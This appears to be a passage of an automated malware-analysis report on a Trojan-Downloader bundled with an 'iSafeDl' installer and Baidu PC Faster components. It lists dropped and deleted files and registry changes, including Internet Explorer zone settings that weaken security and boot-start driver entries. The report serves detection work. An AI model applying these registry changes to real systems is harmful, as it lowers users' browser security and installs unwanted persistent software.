%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_prog_meter.png (133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\if_warning.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\progressbar_anim.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\lang\dl_install_lang.xml (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\if_question.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\style\common_style.xml (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\layout\msgbox.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_res.xml (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\check_checked.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyBB.tmp\elexInsert.dll (3508 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\soft_remove_button_bk.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\open_dir.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\check_checked.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\dl_inst_protect_icon.png (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\min_btn_bk.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\check_uncheck.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\resource.xml (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scan_check.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\close_btn_bk.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\uninstall_bg.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_bk.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_prog_bk.png (151 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\progressbar_image.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\custom_uncheck.png (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\complete_button_bk.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\switch_button_on.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\dl_inst_optimize_icon.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scan_warning.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\custom_check.png (460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\style\style.xml (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\combo_list.png (615 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\msgbox_bk.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\layout\msgbox.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\feedback_btn_bk.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\arrow_down.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\arrow_up.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_combo_skin.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\if_prompt.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\av_authority_bk.png (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\check_uncheck.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scanview_btn_bk.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\head_unchecked.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_faq_icon.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\layout\install.xml (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyBB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\layout\tipsWnd.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_logo.png (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\yac_side_ico.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scan_complete.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\check_indeterminate.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\switch_button_off.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\head_checked.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scan_scanning.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\if_block.png (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\progressbar_bk.png (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\soft_cof_button_bk.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\nsis_setup (16503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_dlg_bk.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\head_indeteminate.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\nation_icon_list.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\setup.7z (3204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\pvb_line.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\vscroll.png (1 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_tip_icon.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\dl_inst_clean_icon.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\lang\dl_install_lang.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\if_question.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_res.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\check_checked.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\check_uncheck.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyBB.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scanview_btn_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\style (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\custom_check.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\arrow_down.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdBA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_faq_icon.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_logo.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\check_indeterminate.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\uninstall_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\head_indeteminate.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\resource.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\msgbox_btn_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\msgbox_bk_eu.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\layout\tipsWnd.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\open_dir.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\msgbox_close_btn.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\min_btn_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\soft_cof_button_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\complete_button_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\combo_list.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_combo_skin.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\head_unchecked.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\setup.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\layout\msgbox.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\layout (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\nation_icon_list.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\lang (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scan_complete.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\check_uncheck.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\head_checked.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\arrow_up.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\pvb_line.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_btn_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\popup_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\toggle_btn_pop_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\if_warning.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\style (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyBB.tmp\elexInsert.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\soft_remove_button_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scan_check.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\close_btn_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_prog_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\dl_inst_optimize_icon.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\nsis_setup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\if_prompt.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\layout\install.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\progressbar_image.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\switch_button_off.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\vscroll.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyBB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\check_indeterminate.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\dl_inst_protect_icon.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\style\style.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\progressbar_anim.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\style\common_style.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\layout\msgbox.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\check_checked.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\yac_side_ico.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\if_block.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\pvb_skin.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\msgbox_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\feedback_btn_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\install_prog_meter.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\custom_uncheck.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\iSafeDownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\image\av_authority_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\dl_install\layout (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\switch_button_on.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scan_scanning.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\common_dlg_bk.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\scan_warning.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~BC\iSafeDl\skin2\common\image\default\progressbar_bk.png (0 bytes)
Registry activity
The process %original file name%.exe:384 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 44 EC D5 3A D0 9C D2 2D 08 A1 52 9F 63 C0 97"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\_ir_sf_temp_0]
"irsetup.exe" = "Setup Application"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process PCFasterSvc.exe:1628 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\System\CurrentControlSet\Services\BprotectEx\Instances\BprotectEx Instance]
"Altitude" = "388020"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\System\CurrentControlSet\Services\BprotectEx\Instances\BprotectEx Instance]
"Flags" = "0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\System\CurrentControlSet\Services\BprotectEx]
"InstPath" = "%Program Files%\Baidu Security\PC Faster\5.0.0.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\BprotectEx\Instances]
"DefaultInstance" = "BprotectEx Instance"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 86 AB 7E 26 B7 F3 D2 7C 97 1E 98 59 76 FF 5C"
[HKLM\SOFTWARE\Baidu Security\PC Faster\Temp]
"SelfProtectionEnabled" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\BprotectEx]
"Start" = "1"
The following driver will be automatically launched by the OS Loader:
[HKLM\System\CurrentControlSet\Services\Bhbase]
"Start" = "0"
The process PCFasterSvc.exe:1820 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Baidu Security\PC Faster]
"SvcStartTime" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 3A C9 77 E7 CF 50 B7 88 77 D3 12 BB 79 98 44"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Baidu Security\PC Faster]
"BootSilentTime" = "600"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\PCFasterSvc\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\PCFasterSvc\DEBUG]
"Trace Level"
The Trojan-Downloader disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Baidu PC Faster 5.0.0.0"
The process LogReporter.exe:2200 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 0B C4 E0 9E BC 41 82 E4 D4 2B 15 6E F3 CD EF"
The process LogReporter.exe:2412 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\LogReporter\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
